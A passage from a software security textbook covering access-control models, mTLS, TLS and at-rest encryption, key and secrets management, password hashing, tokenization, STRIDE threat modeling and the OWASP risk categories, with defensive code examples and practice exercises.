input.resource.owner_dept == input.subject.dept
}
# The application asks "may I?" and enforces the answer; it does not contain
# the rules. That separation is what makes policy auditable and changeable
# without a code deploy.
Three rules apply to any model. Default deny — the absence of a matching allow rule is a denial, so a new resource type is inaccessible rather than public. Enforce server-side at the data boundary, because a UI that hides a button has not prevented the API call. And never take the authorization subject from the request body: the identity comes from the verified token, or a client can simply claim to be someone else.
Key Takeaways
- RBAC maps users to roles to permissions: simple and auditable, but blind to context; role explosion is the symptom of pushing it too far.
- ABAC evaluates policies over subject, resource, action, and environment attributes: expressive and contextual, harder to audit.
- Most systems combine coarse roles with attribute conditions; ReBAC suits collaboration and hierarchy-shaped permissions.
- Externalizing policy as code makes rules versionable, testable, and deployable without shipping the service.
- Always default deny, always enforce server-side, and always take the subject from the verified token rather than the request.
🧪 Practice
- Model a document system in RBAC, then add "only within the owner's department" and observe how many roles that requires.
- Write the equivalent ABAC policy and a test suite covering the allow path, the deny path, and the missing-attribute path.
- Interview: Your RBAC system has 400 roles for 200 users. What went wrong and what do you do? (Hint: look at what distinguishes roles from one another — capability, or context that should have been an attribute.)
Service-to-Service Authentication and mTLS
Inside a distributed system, services call each other constantly, and each call needs an answer to "is the caller who it claims to be, and may it do this?". Network location is not an answer. The traditional model — a trusted internal network where anything inside the perimeter is assumed friendly — fails the moment any single service, container, or CI runner is compromised, because the attacker inherits the whole network's trust.
Mutual TLS (mTLS) provides cryptographic identity for both sides of every connection. Ordinary TLS authenticates the server to the client; mTLS adds the reverse, so each service presents a certificate that names it, and each verifies the other against a shared certificate authority. Identity becomes a property of the connection, verified by cryptography rather than inferred from an IP address.
NETWORK-PERIMETER TRUST mTLS IDENTITY
[ firewall ] every connection:
inside = trusted client cert: spiffe://prod/orders
[orders] --> [payments] server cert: spiffe://prod/payments
[wiki] --> [payments] <-- also both verified against the CA
[ci] --> [payments] <-- also
payments' policy:
one compromised host inside allow spiffe://prod/orders
can call anything deny everything else
identity = "you reached the port" identity = a certificate you must
hold the private key for
# In a service mesh, mTLS and its policy are infrastructure configuration:
# certificates are issued, rotated, and verified by sidecars, so application
# code never handles a private key.
apiVersion: security.istio.io/v1
kind: PeerAuthentication
metadata:
name: default
namespace: prod
spec:
mtls:
mode: STRICT # reject any plaintext connection in this namespace
---
apiVersion: security.istio.io/v1
kind: AuthorizationPolicy
metadata:
name: payments-callers
namespace: prod
spec:
selector:
matchLabels: { app: payments }
action: ALLOW # with an ALLOW policy present, everything else denies
rules:
- from:
- source:
principals: ["cluster.local/ns/prod/sa/orders"] # cryptographic identity
to:
- operation:
methods: ["POST"]
paths: ["/v1/charges"] # least privilege at the endpoint level
Certificate lifetime is the key operational decision, and it is the opposite of the web-PKI instinct. Internal workload certificates should be short — hours, not years — because a short lifetime bounds the damage of a stolen key and forces the rotation machinery to be exercised constantly rather than annually by hand. That is only viable with automated issuance (SPIFFE/SPIRE, a mesh CA, or an internal PKI with an agent).
The alternative and complement to mTLS is token-based service identity: the caller obtains a short-lived token from an issuer (via the OAuth client credentials grant or a workload identity federation) and presents it. The two solve overlapping problems at different layers.
| Approach | Identity is bound to | Strengths | Watch out for |
|---|---|---|---|
| mTLS | The TLS connection | Encrypts too; transparent to app code | PKI operations; per-connection only |
| Service tokens (JWT/OAuth) | The request | Carries claims; works across hops/proxies | Must verify aud; bearer = stealable |
| Network policy / firewall | The IP address | Cheap defence in depth | Not an identity; forgeable inside |
| API keys | A shared secret | Trivial to implement | Long-lived, hard to rotate, leaks |
The common mature pattern is mTLS for transport identity and encryption plus a propagated token carrying the end user's identity, because the two answer different questions: mTLS proves which service called, while the token preserves on whose behalf. A payments service usually needs both — and must never infer the user from an unauthenticated header the caller supplied.
Key Takeaways
- Network location is not an identity; perimeter trust collapses the moment one internal host is compromised.
- mTLS gives both sides cryptographic identity plus encryption, and in a mesh it is configuration rather than application code.
- Keep workload certificate lifetimes short (hours) with automated issuance — short lifetimes bound key theft and keep rotation exercised.
- Authorize on cryptographic identity with least privilege per endpoint, not on IP ranges.
- Combine transport identity (which service) with a propagated token (which user); never trust a caller-supplied user header.
🧪 Practice
- Configure strict mTLS between two services and verify that a plaintext client is rejected.
- Write an authorization policy allowing exactly one caller to one endpoint, and test that a second service is denied.
- Interview: A service needs to know both which service called it and which user initiated the request. How do you carry both? (Hint: think about which layer each identity belongs to and what would happen if the user identity were just a header.)
<a id="112-data-protection"></a>
11.2 Data Protection
Authentication controls who gets in; data protection limits what an attacker gains when something else has already failed. This subchapter covers encryption on the wire and at rest, the key and secret management that makes encryption meaningful, and the specialized handling that passwords and sensitive fields require.
Encryption in Transit
Data moving between two machines passes through equipment neither party controls: switches, load balancers, ISPs, cloud fabric, and occasionally an attacker's laptop on the same coffee-shop Wi-Fi. Encryption in transit makes that path irrelevant by ensuring anyone in the middle sees ciphertext, cannot alter it undetected, and cannot impersonate the endpoint.
TLS provides three distinct guarantees, and it is worth separating them because designs often need to reason about one at a time. Confidentiality: the payload is unreadable in transit. Integrity: modification is detected. Authentication: the server proves it owns the domain, via a certificate chaining to a trusted authority. Encryption without that third property is worthless — an attacker who can intercept can also offer their own key.
TLS 1.3 HANDSHAKE -- one round trip, then application data
client server
| ClientHello: supported ciphers, key share |
|------------------------------------------------->|
| ServerHello: chosen cipher, key share, |
| certificate, signature over the handshake |
|<-------------------------------------------------|
| verify cert chain -> trusted CA? |
| verify hostname -> matches what I asked for? |
| derive shared secret (ECDHE) |
| Finished |
|------------------------------------------------->|
|========== encrypted application data ============|
ECDHE gives FORWARD SECRECY: the session key is derived per connection and
never transmitted, so stealing the server's private key later does NOT
decrypt recorded past traffic.
TLS 1.2: two round trips, optional forward secrecy, weak ciphers permitted.
TLS 1.3: one round trip, forward secrecy mandatory, weak ciphers removed.
# A modern, boring TLS configuration -- the goal is no interesting choices.
server {
listen 443 ssl;
http2 on;
server_name api.example.com;
ssl_certificate /etc/ssl/fullchain.pem; # leaf + intermediates, in order
ssl_certificate_key /etc/ssl/privkey.pem; # never leaves the host
ssl_protocols TLSv1.2 TLSv1.3; # 1.0/1.1 are dead; drop them
ssl_prefer_server_ciphers off; # TLS 1.3: let the client pick
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256;
# ^ ECDHE = forward secrecy ^ GCM = authenticated encryption
ssl_session_tickets off; # ticket keys, if not rotated, undo forward secrecy
ssl_stapling on; # staple OCSP so clients need no extra round trip
# Tell browsers to never use plaintext for this domain again.
add_header Strict-Transport-Security "max-age=63072000; includeSubDomains" always;
location / { proxy_pass http://backend; }
}
server {
listen 80;
server_name api.example.com;
return 301 https://$host$request_uri; # redirect, but HSTS is the real fix
}
The architectural decisions sit around TLS rather than inside it. Where does TLS terminate? Terminating at the load balancer simplifies certificate management but leaves the hop to the backend in plaintext — acceptable only if that segment is genuinely trusted, which in a shared cloud network it usually is not. Re-encrypting to the backend, or running mTLS end to end (11.1), closes it.
Internal traffic needs it too. "It is inside the VPC" assumes an attacker never gets inside, which is precisely the assumption zero trust rejects (see 11.3). Certificate lifecycle must be automated: expired certificates are one of the most common self-inflicted outages, and ACME-based renewal with expiry alerting removes the entire class.
| Decision | Option A | Option B |
|---|---|---|
| Termination point | At the edge (simpler) | End-to-end / re-encrypt (safer) |
| Internal traffic | Plaintext in a "trusted" VPC | mTLS everywhere (zero trust) |
| Cert issuance | Manual purchase | ACME automation, short lifetimes |
| Client verification | Server-auth only | Mutual TLS for service-to-service |
| Pinning (mobile apps) | None | Pin to a CA or key, with a backup pin |
Key Takeaways
- TLS provides confidentiality, integrity, and server authentication; the third is what makes the first two meaningful.
- Prefer TLS 1.3, require forward secrecy (ECDHE), and drop TLS 1.0/1.1 and non-AEAD ciphers.
- HSTS prevents downgrade to plaintext far more reliably than an HTTP redirect.
- Decide deliberately where TLS terminates; a plaintext hop behind the load balancer is a real exposure, not a detail.
- Automate certificate renewal and alert on expiry — expired certs are a leading cause of self-inflicted outages.
🧪 Practice
- Test a live endpoint's TLS configuration and list every protocol or cipher you would disable, with a reason for each.
- Configure HSTS with a preload-eligible policy and explain what breaks if you later need to serve that domain over HTTP.
- Interview: Your load balancer terminates TLS and talks HTTP to backends. Is that acceptable? (Hint: ask who else can observe that network segment, and what your answer would be during an audit.)
Encryption at Rest
Encryption at rest protects data on storage media from anyone who obtains the media rather than the application: a stolen disk, a decommissioned drive, a snapshot copied out of a cloud account, a backup file on someone's laptop. It is also the control most often misunderstood, because it defends against a specific threat and not against the ones people assume.
The critical distinction is where encryption happens, because that determines what an attacker must compromise to read the data.
LAYERS OF AT-REST ENCRYPTION -- each defeats a different attacker
application-level (field encryption)
ciphertext in the DB; only the app can decrypt
defeats: stolen disk, DB dump, malicious DBA, SQL injection reading rows
|
database-level (TDE)
DB decrypts transparently for any authenticated query
defeats: stolen disk, stolen data files, raw backup theft
does NOT defeat: anyone with valid DB credentials
|
disk/volume-level (LUKS, EBS encryption)
OS sees plaintext once mounted
defeats: physical theft, decommissioned media, raw snapshot access
does NOT defeat: anyone with access to the running machine
"The database is encrypted" almost always means the bottom two layers --
which is no protection at all against a leaked application credential.
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
# ---- Application-level field encryption with envelope encryption ------------
# Envelope encryption: a per-record data key encrypts the data; a KMS master key
# encrypts the data key. The master key never leaves the KMS.
def encrypt_field(plaintext: str, kms, key_id: str, record_id: str) -> dict:
data_key = kms.generate_data_key(key_id) # {'plain': b'..', 'wrapped': b'..'}
nonce = os.urandom(12) # unique per encryption, never reused
aad = record_id.encode() # bind ciphertext to this record
ct = AESGCM(data_key["plain"]).encrypt(nonce, plaintext.encode(), aad)
del data_key["plain"] # drop the plaintext key promptly
return {
"ciphertext": ct,
"nonce": nonce,
"wrapped_key": data_key["wrapped"], # stored beside the data
"key_id": key_id, # which master key: needed to rotate
}
def decrypt_field(record: dict, kms, record_id: str) -> str:
plain_key = kms.decrypt(record["wrapped_key"]) # the only KMS call on read
aad = record_id.encode()
# AAD binding means a ciphertext copied into ANOTHER row fails to decrypt --
# it defeats the "swap the encrypted SSN between rows" attack.
return AESGCM(plain_key).decrypt(record["nonce"], record["ciphertext"], aad).decode()
Encrypting individual fields breaks the things databases are good at: you cannot index, sort, or range-query a ciphertext column, and equality search only works with deterministic encryption, which leaks which rows share a value. This is the real cost, and it is why field-level encryption is applied selectively — to the handful of columns that genuinely warrant it (payment data, national IDs, health records) rather than to everything.
| Layer | Protects against | Does not protect against | Query impact |
|---|---|---|---|
| Disk / volume | Physical theft, discarded media | Anything on the running host | None |
| Database TDE | Stolen data files and raw backups | Valid DB credentials, SQL injection | None |
| Field-level | DB dumps, malicious DBA, injected reads | A compromised application server | No index/range/sort |
| Client-side E2E | Everything server-side, including you | Compromised client | Server cannot process |
Three practices matter regardless of layer. Encrypt backups and snapshots with the same rigour — a backup is a full copy of the database with a habit of being stored somewhere less controlled. Test restore from an encrypted backup, because a backup you cannot decrypt is not a backup, and key loss is indistinguishable from data loss. And record which key version encrypted each record, so rotation can proceed incrementally instead of requiring a stop-the-world re-encryption.
Key Takeaways
- At-rest encryption defends against media-level compromise; the layer chosen determines which attacker it actually stops.
- Disk and TDE encryption do nothing against a leaked application or database credential — the most common real breach path.
- Field-level encryption with envelope keys protects against DB dumps and privileged insiders, at the cost of indexing, sorting, and range queries.
- Bind ciphertext to its record with AAD so ciphertexts cannot be swapped between rows.
- Encrypt backups equally, store the key version per record, and rehearse restore — lost keys are lost data.
🧪 Practice
- Take a table containing an email, a national ID, and a balance, and decide which columns warrant field-level encryption and what each choice costs you in queries.
- Implement envelope encryption with a mock KMS, including a key-version field, and write the incremental re-encryption routine.
- Interview: Your database has TDE enabled and an attacker exfiltrates data via SQL injection. Did encryption help? (Hint: think about who performs the decryption and on whose behalf.)
Key Management and Rotation
Encryption converts the problem of protecting data into the problem of protecting keys, and that second problem is where most real failures occur. A key checked into a repository, embedded in an image, or shared over chat has silently converted encrypted data into plaintext data with extra steps.
The organizing idea is a key hierarchy. A small number of long-lived master keys live in hardware or a managed key service and never leave it; they encrypt data keys, which encrypt data. This is what makes rotation and revocation tractable: re-wrapping thousands of data keys is cheap, while re-encrypting terabytes of data is not.
KEY HIERARCHY (envelope encryption)
[ HSM / KMS ] root key never exportable; hardware-backed
| all use is logged and access-controlled
v encrypts
[ master / CMK ] per environment or per data class
|
v encrypts
[ data keys ] per record, per file, per tenant
|
v encrypts
[ the actual data ]
Rotating a master key = re-wrap the data keys (fast, metadata-only).
Rotating a data key = re-encrypt that record's data (slow, but scoped).
Losing the root key = the data is gone. There is no recovery path.
# Rotation without downtime: write with the new key, read with either, then
# migrate lazily. The version tag on each record is what makes this possible.
CURRENT_KEY_ID = "cmk-2026-08"
def write(record_id, plaintext, kms, store):
blob = encrypt_field(plaintext, kms, CURRENT_KEY_ID, record_id)
store.put(record_id, blob) # always the newest key
def read(record_id, kms, store):
blob = store.get(record_id)
plaintext = decrypt_field(blob, kms, record_id) # old key still enabled
if blob["key_id"] != CURRENT_KEY_ID:
# Lazy migration: re-encrypt on access, so hot data migrates first and
# a background job only has to sweep the cold tail.
write(record_id, plaintext, kms, store)
return plaintext
# Retiring the old key safely:
# 1. new key created and enabled for decrypt (both keys usable)
# 2. writes switch to the new key (drift begins)
# 3. lazy + background migration until count(old) = 0 (verify with a query)
# 4. DISABLE the old key, wait through the retention window
# 5. only then schedule deletion -- disable is reversible, deletion is not
The practices that separate working key management from theatre:
- Never store keys with the data they protect. A key column in the same database as the ciphertext gives an attacker both in one dump.
- Separate keys by environment and data class. Staging must not be able to decrypt production, and a compromised key should have a bounded scope.
- Enforce least privilege on key usage. A service that only writes needs encrypt permission, not decrypt.
- Log every key operation. KMS audit logs are often the only evidence of what an attacker actually read.
- Plan for compromise, not just rotation. Emergency rotation is a different procedure — it requires knowing which data used the key, and how fast every record can be re-encrypted.
- Rotate on a schedule and on events. Scheduled rotation limits exposure windows; departures, suspected leaks, and incidents force immediate rotation.
| Key type | Typical lifetime | Rotation cost |
|---|---|---|
| Root / HSM key | Years | Very high; avoid by design |
| Master key (CMK) | 1 year | Low — re-wrap data keys only |
| Data key | Per record/file | Re-encrypt that record |
| TLS certificate | 90 days or less | Automated (ACME) |
| Workload identity | Hours | Fully automated, continuous |
| Signing key (JWT) | Months, overlapped | Publish new, overlap, retire old |
Key Takeaways
- Encryption moves the problem to key protection; a leaked key makes the ciphertext equivalent to plaintext.
- Use a key hierarchy — root and master keys in a KMS/HSM, data keys per record — so rotation is a re-wrap rather than a re-encryption.
- Tag every record with its key version to allow lazy, zero-downtime rotation.
- Disable before deleting a key; deletion is irreversible and indistinguishable from data loss.
- Separate keys by environment and data class, restrict encrypt/decrypt permissions independently, and log every key operation.
🧪 Practice
- Design the key hierarchy for a multi-tenant system where each tenant must be cryptographically isolated, and state what "delete a tenant" then means.
- Implement lazy rotation with a version tag and write the query that proves migration is complete.
- Interview: A key may have been exposed six months ago. What is your response plan? (Hint: think about what you must be able to enumerate, and what the audit logs would need to have recorded for you to scope the damage.)
Secrets Management
A secret is any credential a system needs but must not reveal: database passwords, API keys, signing keys, service account tokens. The problem is that applications need them at run time, which creates a distribution question — and the wrong answers to it are the most common finding in any security review.
Secrets in source control are the canonical failure. Git history is permanent, so a secret committed once is exposed even after the file is deleted, and a private repository becomes public more often than anyone plans for. Secrets baked into container images are the same problem with a different filesystem: anyone who can pull the image can read them.
MATURITY LADDER
0. hardcoded in source in git forever; in every fork and clone
1. config file in the image anyone who can pull the image has it
2. environment variables better; visible in `ps`, crash dumps, logs
3. secrets manager + injection fetched at start-up, never on disk
4. dynamic short-lived secrets generated per session, auto-expiring
5. no secret at all workload identity: the platform vouches
for the workload; nothing to steal
Each rung reduces both the exposure window and the number of copies.
import os, time, requests
# ---- Level 3: fetch at startup from a secrets manager ----------------------
class SecretsClient:
def __init__(self, vault_url, role_token):
self.url, self.token, self._cache = vault_url, role_token, {}
def get(self, path, ttl=300):
entry = self._cache.get(path)
if entry and entry["expires"] > time.time():
return entry["value"] # cache: do not hammer the vault
r = requests.get(f"{self.url}/v1/{path}",
headers={"X-Vault-Token": self.token}, timeout=2)
value = r.json()["data"]
self._cache[path] = {"value": value, "expires": time.time() + ttl}
return value
# Cached in memory only: never written to disk, never logged.
# ---- Level 4: dynamic credentials, created per application instance --------
def dynamic_db_credentials(vault):
creds = vault.get("database/creds/orders-role")
# Vault created this user in the database seconds ago with a 1-hour lease.
# Consequences worth noting:
# - a leaked credential expires by itself
# - every instance has a DISTINCT username, so audit logs attribute
# activity to a specific workload
# - revocation is one API call, no deploy required
return creds["username"], creds["password"], creds["lease_duration"]
# ---- Level 5: workload identity, no secret to distribute at all ------------
def cloud_db_token(metadata_url):
# The platform attests the workload's identity; the database accepts that
# attestation. There is no password anywhere to leak, rotate, or commit.
token = requests.get(metadata_url, headers={"Metadata-Flavor": "Google"}).text
return token
Environment variables deserve a specific note because they are widely treated as the finish line. They are a genuine improvement over files in an image, but they are visible in process listings, inherited by child processes, frequently dumped into crash reports and error trackers, and printed wholesale by well-meaning debug endpoints. They are acceptable for low-sensitivity configuration and a weak choice for high-value credentials.
Two operational habits close the remaining gaps. Scan for secrets in CI and in pre-commit hooks, so the common accident is caught before it becomes permanent history. And treat any exposed secret as compromised immediately — the response is rotation, not deletion of the commit. Rewriting history does not un-clone a repository or un-read a log line.
Key Takeaways
- Never commit secrets: git history is permanent, and image layers are readable by anyone who can pull.
- Environment variables beat files in images but leak through process listings, crash dumps, and error trackers.
- A secrets manager with in-memory caching keeps credentials off disk and centralizes rotation and audit.
- Dynamic short-lived credentials make leaks self-expiring and attribute activity to a specific workload.
- Workload identity is the strongest option: no distributed secret exists at all; and any exposed secret must be rotated, not merely deleted.
🧪 Practice
- Add secret scanning to a pre-commit hook and to CI, then verify both catch a planted test credential.
- Convert a service from a static database password to dynamic credentials with a one-hour lease, and describe what happens at renewal time.
- Interview: A production API key was pushed to a public repository and the commit was reverted within a minute. What do you do? (Hint: consider how fast automated scrapers work and whether reverting removes anything from a clone.)
Password Hashing
Passwords must be verifiable without being recoverable, because a breach will eventually expose the store and users reuse passwords across services. That requirement rules out encryption — anything reversible is reversible by whoever holds the key — and points at one-way hashing.
Ordinary cryptographic hashes are the wrong tool, and the reason is instructive. SHA-256 is designed to be fast, which is exactly wrong here: modern GPUs compute billions of SHA-256 hashes per second, so an attacker with a leaked table of unsalted hashes can exhaust the entire realistic password space. Password hashing functions are deliberately slow and memory-hard, so each guess costs the attacker real resources.
GUESSES PER SECOND (single high-end GPU, order-of-magnitude)
MD5 ~ 100,000,000,000 entire 8-char space in hours
SHA-256 ~ 10,000,000,000 same story
bcrypt cost 12 ~ 30,000 ~1,000,000x slower than SHA-256
argon2id 64MB ~ 3,000 memory cost defeats GPU parallelism
The defence is not secrecy of the algorithm -- it is that each guess costs
the attacker roughly what one login costs you (a few hundred milliseconds).
from argon2 import PasswordHasher
from argon2.exceptions import VerifyMismatchError, VerificationError
# Argon2id: memory-hard, so GPUs and ASICs lose most of their advantage.
ph = PasswordHasher(
time_cost=3, # iterations
memory_cost=65536, # 64 MB per hash -- the anti-GPU parameter
parallelism=4,
)
def register(password: str) -> str:
# The salt is generated automatically and stored INSIDE the returned string,
# so identical passwords produce different hashes and rainbow tables die.
return ph.hash(password)
# '$argon2id$v=19$m=65536,t=3,p=4$<salt>$<hash>'
# ^ parameters are embedded, which is what makes upgrades possible
def login(password: str, stored_hash: str, user, store) -> bool:
try:
ph.verify(stored_hash, password)
except (VerifyMismatchError, VerificationError):
return False
# Transparent upgrade: when the cost parameters are raised, rehash on the
# next successful login -- the only moment the plaintext is available.
if ph.check_needs_rehash(stored_hash):
store.update_password_hash(user.id, ph.hash(password))
return True
| Algorithm | Status | Notes |
|---|---|---|
| Argon2id | Preferred | Memory-hard; tune memory first, then time |
| scrypt | Good | Memory-hard; well established |
| bcrypt | Acceptable | Widely available; 72-byte input limit |
| PBKDF2 | Acceptable if required | Not memory-hard; needs a very high iteration count |
| SHA-256 / MD5 | Never for passwords | Far too fast; unsalted variants are trivially broken |
Several surrounding decisions matter as much as the algorithm. Tune parameters to your hardware, targeting roughly 200–500 ms per hash on production machines — high enough to hurt attackers, low enough that a login burst does not exhaust CPU (deliberately slow hashing is also a denial-of-service surface, so rate-limit login attempts). Never truncate or pre-hash carelessly into bcrypt's 72-byte limit. Compare in constant time, which every good library already does. And check candidate passwords against known-breached lists rather than enforcing baroque composition rules — modern guidance favours length and a breach check over forced symbols and 90-day expiry, both of which push users toward predictable patterns.
Key Takeaways
- Passwords must be hashed with a deliberately slow, memory-hard function — never encrypted, never hashed with SHA-256 or MD5.
- A unique per-password salt is mandatory and is stored inside the hash string by modern libraries.
- Prefer Argon2id; tune parameters to about 200–500 ms per hash on your hardware and re-tune as hardware improves.
- Embedded parameters allow transparent upgrades: rehash on successful login when the cost has changed.
- Rate-limit authentication (slow hashing is also a DoS surface) and screen passwords against breach lists instead of enforcing composition rules.
🧪 Practice
- Benchmark Argon2id on your hardware and find the parameters giving ~250 ms per hash; record the memory cost per concurrent login.
- Implement transparent rehashing on login and prove that an old-parameter hash is upgraded after one successful authentication.
- Interview: Your password store leaks. What determines how bad it is? (Hint: think about cost per guess, whether salts were unique, and how quickly you can force a reset.)
Tokenization and Data Masking
Encryption protects data while still keeping it, which means the risk and the compliance obligations travel with it. Tokenization and masking take a different approach: reduce the number of places sensitive data exists at all, and give everything else a harmless stand-in.
Tokenization replaces a sensitive value with a random surrogate — a token — that has no mathematical relationship to the original. The real value lives in one hardened vault; every other system stores only the token. Because the token is not derived from the data, no key compromise anywhere else can reverse it. This is why payment systems use it: a token in the orders database is not card data, so that database falls largely outside PCI scope.
Masking transforms data for display or for non-production use — ****1234,
or a realistic but fake name in a staging database. The purpose is to let people
and systems work without ever seeing the real value.
ENCRYPTION TOKENIZATION
card + key -> ciphertext card -> [ token vault ] -> random token
reversible with the key reversible ONLY via the vault lookup
ciphertext is still token is meaningless data:
"card data" for compliance no key can reveal it
every holder is in scope only the vault is in scope
4111 1111 1111 1111 4111 1111 1111 1111
| |
v AES + key v vault stores the mapping
8f3a92bd7c... tok_9f2b8c1e4a7d
(protect the key everywhere) (protect one vault; tokens are inert)
import secrets
class TokenVault:
"""The only system that ever holds real values. Everything else has tokens."""
def __init__(self, store):
self.store = store # hardened, heavily audited, tightly scoped
def tokenize(self, value: str, kind: str) -> str:
token = f"tok_{secrets.token_hex(12)}" # random, not derived
self.store.put(token, {"value": value, "kind": kind})
return token
def detokenize(self, token: str, actor: str) -> str:
# Every read is authorized and logged: the audit trail is the point.
audit.log("detokenize", token=token, actor=actor)
return self.store.get(token)["value"]
# Format-preserving tokens keep downstream systems working unchanged.
def format_preserving_card_token(pan: str, vault) -> str:
token = vault.tokenize(pan, "pan")
# Keep the last four so support and users can still identify the card,
# and keep the length so validation and UI layouts do not break.
return {"token": token, "last4": pan[-4:], "brand": detect_brand(pan)}
# ---- Masking: same value, reduced exposure by context ----------------------
def mask(value: str, kind: str, viewer_role: str) -> str:
if viewer_role == "fraud_investigator" and kind == "pan":
return value # authorized full view
if kind == "pan": return "*" * 12 + value[-4:]
if kind == "email":
user, _, domain = value.partition("@")
return f"{user[0]}{'*' * (len(user) - 1)}@{domain}"
if kind == "ssn": return "***-**-" + value[-4:]
return "***"
The strongest form of masking is for non-production environments. Copying production data into staging is the single most common way sensitive data ends up somewhere with weaker controls, broader access, and no audit trail. Proper pseudonymization for test data preserves the shape — referential integrity, distributions, formats — without preserving any real person's information.
| Technique | Reversible? | Typical use |
|---|---|---|
| Encryption | Yes, with the key | Data you must recover in full |
| Tokenization | Only via the vault | Payment data, national IDs |
| Static masking | No | Non-production datasets |
| Dynamic masking | N/A (view-time) | Support tools, dashboards |
| Redaction | No | Logs, exports, error reports |
| Synthetic data | No original exists | Testing, demos, ML development |
One habit prevents a large share of accidental leaks: redact at the boundary, not at the call site. A logging filter that scrubs known-sensitive field names centrally will outperform a rule that every developer must remember on every log line, and it keeps working when someone logs an entire request object during a 3 a.m. debugging session.
Key Takeaways
- Tokenization replaces sensitive values with random surrogates whose real values live in one vault, shrinking compliance scope to that vault.
- Tokens are not derived from the data, so no key compromise elsewhere reverses them.
- Format-preserving tokens keep length and last-four so downstream systems and support workflows continue to function.
- Mask by context and role at view time; use static masking or synthetic data for non-production environments.
- Redact centrally at logging and export boundaries rather than relying on per-call-site discipline.
🧪 Practice
- Design the tokenization boundary for an order system so the orders database never stores a card number, and list which services remain in scope.
- Write a logging filter that redacts a configurable set of field names at any nesting depth, and test it against a nested request object.
- Interview: Why does tokenizing card numbers reduce PCI scope while encrypting them does not, to the same degree? (Hint: think about what an attacker who steals the database plus every key in that system can do in each case.)
<a id="113-threats-and-defenses"></a>
11.3 Threats and Defenses
Knowing the mechanisms is not the same as knowing what to defend against. This subchapter covers how to reason systematically about attacks, the vulnerability classes that actually cause breaches, and the structural principles — zero trust, defence in depth, audit logging — that limit damage when a control fails.
Threat Modeling
Threat modeling is the practice of asking, before the system is built, what could go wrong and what you will do about it. Without it, security work is driven by whatever was in the news, which produces systems hardened against fashionable attacks and wide open to the obvious ones. With it, security becomes a design input with the same status as latency or cost.
Four questions structure the whole exercise: What are we building? What can go wrong? What are we going to do about it? Did we do a good job? The first requires a data flow diagram with explicit trust boundaries; the second is where a taxonomy helps, because unaided brainstorming reliably misses categories.
STRIDE is the most used taxonomy — six threat types, applied to each element of the diagram.
| Threat | The question it asks | Property violated | Typical control |
|---|---|---|---|
| Spoofing | Can someone pretend to be another? | Authentication | mTLS, MFA, signed tokens |
| Tampering | Can data be altered undetected? | Integrity | Signatures, checksums, TLS |
| Repudiation | Can someone deny an action? | Non-repudiation | Audit logs, signing |
| Information disclosure | Can data leak? | Confidentiality | Encryption, access control |
| Denial of service | Can it be made unavailable? | Availability | Rate limits, quotas, autoscaling |
| Elevation of privilege | Can someone gain more rights? | Authorization | Least privilege, validation |
DATA FLOW DIAGRAM WITH TRUST BOUNDARIES
Threats concentrate where a flow CROSSES a boundary -- that is the whole
reason to draw them.
internet : DMZ : internal : data
: : :
[ browser ] --1--> [ API gateway ] --2--> [ orders svc ] --3--> [ DB ]
: : | :
: : 4 :
: : v :
: : [ payments (3rd party) ]
1 S: stolen session T: request tampering I: sniffing D: flood
2 S: forged internal call E: gateway bypass (can 3 be reached directly?)
3 I: credentials in config T: SQL injection R: no audit of who read what
4 S: is the vendor's cert verified? I: what PII crosses this boundary?
# A threat model kept as data next to the code -- reviewable in pull requests
# and assertable in CI, which is what stops it becoming a stale document.
THREATS = [
{
"id": "T-01",
"flow": "browser -> api_gateway",
"stride": "Spoofing",
"scenario": "Attacker replays a stolen session cookie from a public PC",
"impact": "high", "likelihood": "medium",
"mitigation": "15-min session TTL; re-auth for sensitive actions; "
"bind session to device fingerprint",
"status": "implemented", "verified_by": "test_session_expiry",
},
{
"id": "T-04",
"flow": "orders_svc -> payments_vendor",
"stride": "Information disclosure",
"scenario": "Full card PAN sent to the vendor and written to debug logs",
"impact": "critical", "likelihood": "medium",
"mitigation": "Tokenize before the boundary; central log redaction",
"status": "accepted_risk", # explicit, dated, and owned
"owner": "payments-team", "review_by": "2026-11-01",
},
]
def unmitigated_critical(threats):
return [t for t in threats
if t["impact"] == "critical" and t["status"] not in ("implemented",)]
# A CI check that fails the build on an unmitigated critical threat turns the
# model from documentation into a control.
Two practical notes. Do it early and repeat it at changes — threat modeling a finished system finds problems that are expensive to fix, while threat modeling a design finds the same problems when they cost a diagram edit. And accept risk explicitly: "we know, we chose not to fix it, here is who owns it and when we revisit" is a legitimate and often correct outcome. The failure is unexamined risk, not accepted risk.
Complementary techniques fill gaps STRIDE leaves. Attack trees decompose a specific goal ("steal a customer's funds") into paths, which is better for depth on one high-value target. PASTA and similar frameworks add business impact weighting. And a kill chain view asks not only how an attacker gets in but what they can do afterwards — which is what drives segmentation and detection rather than prevention alone.
Key Takeaways
- Threat modeling answers four questions: what are we building, what can go wrong, what will we do, and did it work.
- Draw data flows with explicit trust boundaries; threats cluster where flows cross them.
- STRIDE gives systematic coverage that unaided brainstorming misses.
- Keep the model as versioned data next to the code so it is reviewed and can be enforced in CI.
- Accepting a risk explicitly, with an owner and a review date, is a valid outcome; unexamined risk is not.
🧪 Practice
- Draw a data flow diagram for a login feature with trust boundaries marked, and apply STRIDE to each boundary crossing.
- Build an attack tree for "attacker reads another user's private messages" with at least three distinct root paths.
- Interview: How do you decide which threats to fix first? (Hint: think about combining impact and likelihood with the cost of the mitigation, and what you would tell a regulator about the ones you skipped.)
OWASP Top Risks
The OWASP Top 10 is a periodically updated list of the most critical web application security risks, compiled from real breach and vulnerability data. Its value is not as a checklist to pass but as an empirical answer to "where do failures actually come from?" — which is a very different list from where teams intuitively spend effort.
The consistent headline across recent revisions is that broken access control is the number one category. Not exotic memory corruption, not cryptography — just endpoints that fail to check whether this user may act on this object.
| Risk | What it looks like in practice | Primary defence |
|---|---|---|
| Broken access control | GET /api/orders/1002 returns someone else's order | Server-side per-object authorization |
| Cryptographic failures | Plaintext PII, weak hashes, missing TLS | Classify data; encrypt properly |
| Injection | SQL, NoSQL, OS command, LDAP injection | Parameterized queries; validation |
| Insecure design | No rate limit on password reset; no threat model | Threat modeling; secure patterns |
| Security misconfiguration | Default credentials, debug on, open buckets | Hardened baselines; config scanning |
| Vulnerable components | An unpatched library with a known CVE | SBOM, dependency scanning, patching |
| Auth failures | No MFA, credential stuffing allowed, weak recovery | Rate limits, MFA, breach checks |
| Integrity failures | Unverified updates, insecure deserialization | Signature verification; safe formats |
| Logging/monitoring failures | Breach undetected for months | Audit logs, alerting, retention |
| SSRF | Server fetches an attacker-supplied URL | Allowlist egress; block metadata IPs |
